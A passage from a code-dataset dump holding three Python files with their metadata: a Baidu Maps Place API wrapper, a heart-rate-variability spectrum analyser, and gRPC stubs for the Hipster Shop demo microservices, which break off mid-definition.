...]这样的数组\n 获取一页query相关地理信息\n :param query: 查询关键词\n :param region: 地区\n :param kwargs:\n :return: if success return\n {\n status: 本次API访问状态, 成功返回0, 其他返回其他数字,\n message: 对本次API访问状态值的英文说明, 如果成功返回'ok', 失败返回错误说明,\n total: 检索总数, 用户请求中设置了page_num字段时才会出现, 当检索总数超过760时, 多次刷新同一请求得到的total值, 可能稍有不同\n results: [\n {\n name: POI名称,\n location: {\n lat: 纬度,\n lng: 经度\n },\n address: POI地址信息,\n telephone: POI电话信息,\n uid: POI的唯一标识,\n detail_info: { # POI扩展信息, 仅当scope=2时, 显示该字段, 不同POI类型, 显示的detail_info字段不同\n distance: 距离中心点距离,\n type: POI类型,\n tag: 标签,\n detail_url: POI的详情页,\n price: POI商户的价格,\n shop_hours: 营业时间,\n overall_rating: 总体评分,\n taste_rating: 口味评分,\n service_rating: 服务评分,\n environment_rating: 环境评分,\n facility_rating: 星级评分,\n hygiene_rating: 卫生评分,\n technology_rating: 技术评分,\n image_num: 图片数,\n groupon_num: 团购数,\n discount_num: 优惠数,\n comment_num: 评论数,\n favorite_num: 收藏数,\n checkin_num: 签到数\n }\n }\n ...\n ]\n }\n else return None.\n \"\"\"\n tag = kwargs.get('tag', '')\n scope = kwargs.get('scope', 1) # 检索结果详细成都, 1 基本信息, 2 POI详细信息\n # filter字段设置, scope为2时有效\n industry_type = kwargs.get('industry_type', 'cater') # 行业类型. 取值范围为: hotel 宾馆, cater 餐饮, life 生活娱乐\n # 排序字段. industry_type为hotel时, 取指范围为: default 默认, price 价格, total_score 好评, level: 星级,\n # health_score: 卫生, distance: 距离; 为cater时, default: 默认, taste_rating: 口味, price: 价格,\n # overall_rating: 好评, service_rating: 服务, distance: 距离; 为life时, default: 默认, price: 价格,\n # overall_rating: 好评, comment_num: 服务, distance: 距离\n sort_name = kwargs.get('sort_name', 'default')\n sort_rule = kwargs.get('sort_rule', 0) # 排序规则, 0 从高到低, 1 从低到高\n groupon = kwargs.get('groupon', 1) # 是否有团购, 1 有团购, 0 无团购\n discount = kwargs.get('discount', 1) # 是否有打折, 1 有打折, 0 无打折\n page_size = kwargs.get('page_size', 20) # 每页数据记录数. 最大返回20条\n page_num = kwargs.get('page_num', 0) # 页序号\n params = {'query': query, 'output': 'json', 'scope': scope, 'page_size': page_size, 'page_num': page_num,\n 'ak': self.scheduler.next()}\n if scope == 2:\n filter = 'industry_type:{industry_type}|sort_name:{sort_name}|sort_rule:{sort_rule}|groupon:{groupon}|' \\\n 'discount:{discount}'.format(industry_type=industry_type, sort_name=sort_name,\n sort_rule=sort_rule, groupon=groupon, discount=discount)\n params['filter'] = filter\n\n if tag:\n params['tag'] = tag\n\n params['region'] = region\n r = requests.get(self.search_url, params=params)\n try:\n r.raise_for_status()\n data = json.loads(r.text)\n # print json.dumps(data, ensure_ascii=False)\n if data['status'] == 0:\n # 在状态为0时, 也有可能没有找到搜索结果, 而是返回在其它城市查找到的结果, 返回格式为[{'num': , 'name': ''} ...]这样的数组\n if len(data['results']) > 0:\n if 'location' in data['results'][0]:\n return data\n logging.debug(data['results'])\n return None\n return data\n else:\n logging.error('failed to get place, return result is %s' % r.text)\n return None\n except Exception as e:\n logging.exception(e)\n return None\n\n def get_place_all(self, query, region, **kwargs):\n u\"\"\"\n 根据关键词query查找所有地址信息\n\n *注意* 百度最多返回400条记录\n :param query: 查询关键词\n :param region: 地区\n :param kwargs:\n :return: if success return\n [\n {\n name: POI名称,\n location: {\n lat: 纬度,\n lng: 经度\n },\n address: POI地址信息,\n telephone: POI电话信息,\n uid: POI的唯一标识,\n detail_info: { # POI扩展信息, 仅当scope=2时, 显示该字段, 不同POI类型, 显示的detail_info字段不同\n distance: 距离中心点距离,\n type: POI类型,\n tag: 标签,\n detail_url: POI的详情页,\n price: POI商户的价格,\n shop_hours: 营业时间,\n overall_rating: 总体评分,\n taste_rating: 口味评分,\n service_rating: 服务评分,\n environment_rating: 环境评分,\n facility_rating: 星级评分,\n hygiene_rating: 卫生评分,\n technology_rating: 技术评分,\n image_num: 图片数,\n groupon_num: 团购数,\n discount_num: 优惠数,\n comment_num: 评论数,\n favorite_num: 收藏数,\n checkin_num: 签到数\n }\n }\n ...\n ]\n else return []\n \"\"\"\n data = []\n kwargs.update({'page_num': 0})\n r = self.get_place_by_page(query, region, **kwargs)\n if r is None:\n return data\n data.extend(r['results'])\n total = r['total']\n page_size = kwargs.get('page_size', 20)\n # print \"total: %d, page_size: %d\" % (total, page_size)\n for i in range(1, total // page_size + 1):\n kwargs.update({'page_num': i})\n r = self.get_place_by_page(query, region, **kwargs)\n if r is None:\n break\n if r['total'] == 0:\n break\n data.extend(r['results'])\n return data\n\n def get_place_by_uids(self, uids, **kwargs):\n u\"\"\"\n Place详情检索服务\n\n uids最多支持10个\n :param uids: string or list\n :param kwargs: available keys include 'output', 'scope'\n :return: same with get_place_all.\n \"\"\"\n params = {}\n if isinstance(uids, list):\n params['uids'] = ','.join(uids)\n else:\n params['uid'] = uids\n params['output'] = kwargs.get('output', 'json') # json or xml 请求返回格式\n params['scope'] = kwargs.get('scope', 1) # 1 返回基本信息, 2 返回POI详细信息\n params['ak'] = self.scheduler.next()\n try:\n r = requests.get(self.detail_url, params=params)\n r.raise_for_status()\n\n data = json.loads(r.text)\n if data['status'] == 0:\n return data['result']\n\n logging.error('failed to get place, return result is %s' % r.text)\n return []\n except Exception as e:\n logging.exception(e)\n return []\n", "sub_path": "build/lib/mapapi/baidu/place_api.py", "file_name": "place_api.py", "file_ext": "py", "file_size_in_byte": 9362, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.get", "line_number": 98, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 101, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 108, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 112, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 115, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 200, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 203, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 207, "usage_type": "call"}, {"api_name": "logging.exception", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "363442748", "text": "from common.analyse import stupid_time_analysis, simple_filter, get_lomb_spectrum, get_cwt_spectrum, get_fft_spectrum, find_start_point\nfrom common.visualization import show_stupid_time_analysis, show_power_frequency\nfrom common.parsers import save_hr_to_csv, save_spectrum_power_to_csv\nfrom common.routines import get_data_path\nfrom multiprocessing import Process\n\n\nclass TrainingAnalyser(Process):\n def __init__(self, training_hash, analyse_settings, athlete_name=None, date=None, activity=None, max_size=None, value=None, return_info=None):\n Process.__init__(self)\n self.training_hash = training_hash\n self.athlete_name = athlete_name\n self.date = date\n self.activity = activity\n self.max_size = max_size\n self.value = value\n self.analyse_settings = analyse_settings\n self.return_info = return_info\n self.save_images = self.analyse_settings['save_images']\n self.show_images = False\n\n def run(self):\n if self.analyse_settings is None or type(self.analyse_settings) != dict:\n return\n\n spectrum_power_dict = None\n\n if 'pre-processing' in self.analyse_settings:\n if 'No filter' in self.analyse_settings['pre-processing']['filter']:\n pass\n elif 'Filter' in self.analyse_settings['pre-processing']['filter']:\n self.training_hash = simple_filter(self.training_hash, self.athlete_name, self.date, self.activity,\n self.show_images, self.save_images)\n\n if 'analyse' in self.analyse_settings:\n if 'time' in self.analyse_settings['analyse']:\n return_info = stupid_time_analysis(self.training_hash)\n self.return_info.append(['Time Analysis',\n show_stupid_time_analysis(return_info, self.athlete_name, self.date, self.activity,\n self.show_images, self.save_images)])\n\n if 'spectrum' in self.analyse_settings['analyse']:\n spectrum_functions = dict()\n if 'fft' in self.analyse_settings['analyse']:\n spectrum_functions['fft'] = get_fft_spectrum\n if 'lomb' in self.analyse_settings['analyse']:\n spectrum_functions['lomb'] = get_lomb_spectrum\n\n sec_interval = 100\n sec_change_step = 10\n assert type(self.training_hash) is dict\n time_values = [float(x) for x in sorted(self.training_hash.keys())]\n time_values = sorted(time_values)\n\n if 'wavelet' in self.analyse_settings['analyse']:\n self.return_info.append(['Spectrum wavelet Analysis', get_cwt_spectrum(\n self.training_hash, time_values[0:len(time_values)], self.athlete_name, self.date,\n self.activity, self.show_images, self.save_images)])\n\n del self.analyse_settings['analyse']['wavelet']\n\n frequency_method = dict()\n\n for key in spectrum_functions.keys():\n spectrum_functions[key](self.training_hash, time_values[0:len(time_values)], self.athlete_name,\n self.date, self.activity, self.show_images, self.save_images)\n\n count = 0\n last_start_point = 0\n last_end_point = 0\n for i in range(0, int(max(time_values) / sec_change_step) + 1):\n start_point = find_start_point(time_values, i * sec_change_step, last_start_point)\n last_start_point = start_point\n end_point = find_start_point(time_values, i * sec_change_step + sec_interval, last_end_point, True)\n last_end_point = end_point\n count += 1\n if end_point == len(time_values) - 1:\n break\n\n if self.max_size is not None:\n self.max_size.value = count\n last_start_point = 0\n last_end_point = 0\n for i in range(0, int(max(time_values) / sec_change_step) + 1):\n start_point = find_start_point(time_values, i * sec_change_step, last_start_point)\n last_start_point = start_point\n end_point = find_start_point(time_values, i * sec_change_step + sec_interval, last_end_point, True)\n last_end_point = end_point\n for key in spectrum_functions.keys():\n if key not in frequency_method:\n frequency_method[key] = []\n frequency_method[key].append(\n spectrum_functions[key](self.training_hash, time_values[start_point:end_point],\n self.athlete_name, self.date, self.activity, self.show_images,\n self.save_images))\n\n if self.value is not None:\n self.value.value = i\n if end_point == len(time_values) - 1:\n break\n\n for key in frequency_method.keys():\n lfl = [x[0] for x in frequency_method[key]]\n hfl = [x[1] for x in frequency_method[key]]\n tpl = [x[2] for x in frequency_method[key]]\n vlf = [x[3] for x in frequency_method[key]]\n vhf = [x[4] for x in frequency_method[key]]\n hf2lf = []\n for x in frequency_method[key]:\n if x[0] is not 0:\n hf2lf.append(x[1] / x[0])\n else:\n hf2lf.append(0)\n if spectrum_power_dict is None:\n spectrum_power_dict = dict()\n spectrum_power_dict[key] = [lfl, hfl, tpl, vlf, vhf, hf2lf]\n self.return_info.append(['Spectrum ' + key + ' Analysis', show_power_frequency(\n [key, lfl, hfl, tpl, vlf, vhf, hf2lf], self.athlete_name, self.date, self.activity,\n self.show_images, self.save_images)])\n\n if self.analyse_settings['save_csv']:\n self.generate_csv(spectrum_power_dict)\n\n self.value.value = -1\n\n def generate_csv(self, spectrum_power_dict):\n data_path = get_data_path(athlete=self.athlete_name, date=self.date, activity=self.activity)\n save_hr_to_csv(data_path + 'hrv_hb_info.csv', self.training_hash)\n if spectrum_power_dict is not None:\n assert type(spectrum_power_dict) is dict\n for key in spectrum_power_dict.keys():\n save_spectrum_power_to_csv(data_path + 'spectrum_data_' + key + '.csv', spectrum_power_dict[key])", "sub_path": "wrappers/analyser.py", "file_name": "analyser.py", "file_ext": "py", "file_size_in_byte": 6926, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "multiprocessing.Process", "line_number": 8, "usage_type": "name"}, {"api_name": "multiprocessing.Process.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 10, "usage_type": "name"}, {"api_name": "common.analyse.simple_filter", "line_number": 32, "usage_type": "call"}, {"api_name": "common.analyse.stupid_time_analysis", "line_number": 37, "usage_type": "call"}, {"api_name": "common.visualization.show_stupid_time_analysis", "line_number": 39, "usage_type": "call"}, {"api_name": "common.analyse.get_fft_spectrum", "line_number": 45, "usage_type": "name"}, {"api_name": "common.analyse.get_lomb_spectrum", "line_number": 47, "usage_type": "name"}, {"api_name": "common.analyse.get_cwt_spectrum", "line_number": 56, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 72, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 74, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 85, "usage_type": "call"}, {"api_name": "common.analyse.find_start_point", "line_number": 87, "usage_type": "call"}, {"api_name": "common.visualization.show_power_frequency", "line_number": 117, "usage_type": "call"}, {"api_name": "common.routines.get_data_path", "line_number": 127, "usage_type": "call"}, {"api_name": "common.parsers.save_hr_to_csv", "line_number": 128, "usage_type": "call"}, {"api_name": "common.parsers.save_spectrum_power_to_csv", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "437056160", "text": "#!/usr/bin/python\n#\n# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!\n\"\"\"Client and server classes corresponding to protobuf-defined services.\"\"\"\nimport grpc\n\nimport demo_pb2 as demo__pb2\n\n\nclass CartServiceStub(object):\n \"\"\"-----------------Cart service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.AddItem = channel.unary_unary(\n '/hipstershop.CartService/AddItem',\n request_serializer=demo__pb2.AddItemRequest.SerializeToString,\n response_deserializer=demo__pb2.Empty.FromString,\n )\n self.GetCart = channel.unary_unary(\n '/hipstershop.CartService/GetCart',\n request_serializer=demo__pb2.GetCartRequest.SerializeToString,\n response_deserializer=demo__pb2.Cart.FromString,\n )\n self.EmptyCart = channel.unary_unary(\n '/hipstershop.CartService/EmptyCart',\n request_serializer=demo__pb2.EmptyCartRequest.SerializeToString,\n response_deserializer=demo__pb2.Empty.FromString,\n )\n\n\nclass CartServiceServicer(object):\n \"\"\"-----------------Cart service-----------------\n\n \"\"\"\n\n def AddItem(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetCart(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def EmptyCart(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CartServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'AddItem': grpc.unary_unary_rpc_method_handler(\n servicer.AddItem,\n request_deserializer=demo__pb2.AddItemRequest.FromString,\n response_serializer=demo__pb2.Empty.SerializeToString,\n ),\n 'GetCart': grpc.unary_unary_rpc_method_handler(\n servicer.GetCart,\n request_deserializer=demo__pb2.GetCartRequest.FromString,\n response_serializer=demo__pb2.Cart.SerializeToString,\n ),\n 'EmptyCart': grpc.unary_unary_rpc_method_handler(\n servicer.EmptyCart,\n request_deserializer=demo__pb2.EmptyCartRequest.FromString,\n response_serializer=demo__pb2.Empty.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.CartService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass CartService(object):\n \"\"\"-----------------Cart service-----------------\n\n \"\"\"\n\n @staticmethod\n def AddItem(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CartService/AddItem',\n demo__pb2.AddItemRequest.SerializeToString,\n demo__pb2.Empty.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def GetCart(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CartService/GetCart',\n demo__pb2.GetCartRequest.SerializeToString,\n demo__pb2.Cart.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def EmptyCart(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CartService/EmptyCart',\n demo__pb2.EmptyCartRequest.SerializeToString,\n demo__pb2.Empty.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass RecommendationServiceStub(object):\n \"\"\"---------------Recommendation service----------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.ListRecommendations = channel.unary_unary(\n '/hipstershop.RecommendationService/ListRecommendations',\n request_serializer=demo__pb2.ListRecommendationsRequest.SerializeToString,\n response_deserializer=demo__pb2.ListRecommendationsResponse.FromString,\n )\n\n\nclass RecommendationServiceServicer(object):\n \"\"\"---------------Recommendation service----------\n\n \"\"\"\n\n def ListRecommendations(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_RecommendationServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'ListRecommendations': grpc.unary_unary_rpc_method_handler(\n servicer.ListRecommendations,\n request_deserializer=demo__pb2.ListRecommendationsRequest.FromString,\n response_serializer=demo__pb2.ListRecommendationsResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.RecommendationService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass RecommendationService(object):\n \"\"\"---------------Recommendation service----------\n\n \"\"\"\n\n @staticmethod\n def ListRecommendations(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.RecommendationService/ListRecommendations',\n demo__pb2.ListRecommendationsRequest.SerializeToString,\n demo__pb2.ListRecommendationsResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass ProductCatalogServiceStub(object):\n \"\"\"---------------Product Catalog----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.ListProducts = channel.unary_unary(\n '/hipstershop.ProductCatalogService/ListProducts',\n request_serializer=demo__pb2.Empty.SerializeToString,\n response_deserializer=demo__pb2.ListProductsResponse.FromString,\n )\n self.GetProduct = channel.unary_unary(\n '/hipstershop.ProductCatalogService/GetProduct',\n request_serializer=demo__pb2.GetProductRequest.SerializeToString,\n response_deserializer=demo__pb2.Product.FromString,\n )\n self.SearchProducts = channel.unary_unary(\n '/hipstershop.ProductCatalogService/SearchProducts',\n request_serializer=demo__pb2.SearchProductsRequest.SerializeToString,\n response_deserializer=demo__pb2.SearchProductsResponse.FromString,\n )\n\n\nclass ProductCatalogServiceServicer(object):\n \"\"\"---------------Product Catalog----------------\n\n \"\"\"\n\n def ListProducts(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def GetProduct(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def SearchProducts(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_ProductCatalogServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'ListProducts': grpc.unary_unary_rpc_method_handler(\n servicer.ListProducts,\n request_deserializer=demo__pb2.Empty.FromString,\n response_serializer=demo__pb2.ListProductsResponse.SerializeToString,\n ),\n 'GetProduct': grpc.unary_unary_rpc_method_handler(\n servicer.GetProduct,\n request_deserializer=demo__pb2.GetProductRequest.FromString,\n response_serializer=demo__pb2.Product.SerializeToString,\n ),\n 'SearchProducts': grpc.unary_unary_rpc_method_handler(\n servicer.SearchProducts,\n request_deserializer=demo__pb2.SearchProductsRequest.FromString,\n response_serializer=demo__pb2.SearchProductsResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.ProductCatalogService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass ProductCatalogService(object):\n \"\"\"---------------Product Catalog----------------\n\n \"\"\"\n\n @staticmethod\n def ListProducts(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ProductCatalogService/ListProducts',\n demo__pb2.Empty.SerializeToString,\n demo__pb2.ListProductsResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def GetProduct(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ProductCatalogService/GetProduct',\n demo__pb2.GetProductRequest.SerializeToString,\n demo__pb2.Product.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def SearchProducts(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ProductCatalogService/SearchProducts',\n demo__pb2.SearchProductsRequest.SerializeToString,\n demo__pb2.SearchProductsResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass ShippingServiceStub(object):\n \"\"\"---------------Shipping Service----------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetQuote = channel.unary_unary(\n '/hipstershop.ShippingService/GetQuote',\n request_serializer=demo__pb2.GetQuoteRequest.SerializeToString,\n response_deserializer=demo__pb2.GetQuoteResponse.FromString,\n )\n self.ShipOrder = channel.unary_unary(\n '/hipstershop.ShippingService/ShipOrder',\n request_serializer=demo__pb2.ShipOrderRequest.SerializeToString,\n response_deserializer=demo__pb2.ShipOrderResponse.FromString,\n )\n\n\nclass ShippingServiceServicer(object):\n \"\"\"---------------Shipping Service----------\n\n \"\"\"\n\n def GetQuote(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def ShipOrder(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_ShippingServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetQuote': grpc.unary_unary_rpc_method_handler(\n servicer.GetQuote,\n request_deserializer=demo__pb2.GetQuoteRequest.FromString,\n response_serializer=demo__pb2.GetQuoteResponse.SerializeToString,\n ),\n 'ShipOrder': grpc.unary_unary_rpc_method_handler(\n servicer.ShipOrder,\n request_deserializer=demo__pb2.ShipOrderRequest.FromString,\n response_serializer=demo__pb2.ShipOrderResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.ShippingService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass ShippingService(object):\n \"\"\"---------------Shipping Service----------\n\n \"\"\"\n\n @staticmethod\n def GetQuote(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ShippingService/GetQuote',\n demo__pb2.GetQuoteRequest.SerializeToString,\n demo__pb2.GetQuoteResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def ShipOrder(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.ShippingService/ShipOrder',\n demo__pb2.ShipOrderRequest.SerializeToString,\n demo__pb2.ShipOrderResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass CurrencyServiceStub(object):\n \"\"\"-----------------Currency service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.GetSupportedCurrencies = channel.unary_unary(\n '/hipstershop.CurrencyService/GetSupportedCurrencies',\n request_serializer=demo__pb2.Empty.SerializeToString,\n response_deserializer=demo__pb2.GetSupportedCurrenciesResponse.FromString,\n )\n self.Convert = channel.unary_unary(\n '/hipstershop.CurrencyService/Convert',\n request_serializer=demo__pb2.CurrencyConversionRequest.SerializeToString,\n response_deserializer=demo__pb2.Money.FromString,\n )\n\n\nclass CurrencyServiceServicer(object):\n \"\"\"-----------------Currency service-----------------\n\n \"\"\"\n\n def GetSupportedCurrencies(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n def Convert(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_CurrencyServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'GetSupportedCurrencies': grpc.unary_unary_rpc_method_handler(\n servicer.GetSupportedCurrencies,\n request_deserializer=demo__pb2.Empty.FromString,\n response_serializer=demo__pb2.GetSupportedCurrenciesResponse.SerializeToString,\n ),\n 'Convert': grpc.unary_unary_rpc_method_handler(\n servicer.Convert,\n request_deserializer=demo__pb2.CurrencyConversionRequest.FromString,\n response_serializer=demo__pb2.Money.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.CurrencyService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass CurrencyService(object):\n \"\"\"-----------------Currency service-----------------\n\n \"\"\"\n\n @staticmethod\n def GetSupportedCurrencies(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CurrencyService/GetSupportedCurrencies',\n demo__pb2.Empty.SerializeToString,\n demo__pb2.GetSupportedCurrenciesResponse.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n @staticmethod\n def Convert(request,\n target,\n options=(),\n channel_credentials=None,\n call_credentials=None,\n insecure=False,\n compression=None,\n wait_for_ready=None,\n timeout=None,\n metadata=None):\n return grpc.experimental.unary_unary(request, target, '/hipstershop.CurrencyService/Convert',\n demo__pb2.CurrencyConversionRequest.SerializeToString,\n demo__pb2.Money.FromString,\n options, channel_credentials,\n insecure, call_credentials, compression, wait_for_ready, timeout, metadata)\n\n\nclass PaymentServiceStub(object):\n \"\"\"-------------Payment service-----------------\n\n \"\"\"\n\n def __init__(self, channel):\n \"\"\"Constructor.\n\n Args:\n channel: A grpc.Channel.\n \"\"\"\n self.Charge = channel.unary_unary(\n '/hipstershop.PaymentService/Charge',\n request_serializer=demo__pb2.ChargeRequest.SerializeToString,\n response_deserializer=demo__pb2.ChargeResponse.FromString,\n )\n\n\nclass PaymentServiceServicer(object):\n \"\"\"-------------Payment service-----------------\n\n \"\"\"\n\n def Charge(self, request, context):\n \"\"\"Missing associated documentation comment in .proto file.\"\"\"\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')\n\n\ndef add_PaymentServiceServicer_to_server(servicer, server):\n rpc_method_handlers = {\n 'Charge': grpc.unary_unary_rpc_method_handler(\n servicer.Charge,\n request_deserializer=demo__pb2.ChargeRequest.FromString,\n response_serializer=demo__pb2.ChargeResponse.SerializeToString,\n ),\n }\n generic_handler = grpc.method_handlers_generic_handler(\n 'hipstershop.PaymentService', rpc_method_handlers)\n server.add_generic_rpc_handlers((generic_handler,))\n\n\n # This class is part of an EXPERIMENTAL API.\nclass PaymentService(object):\n \"\"\"-------------Payment service-----------------\n\n \"\"\"\n\n @staticmethod\n def Charge(request,\n 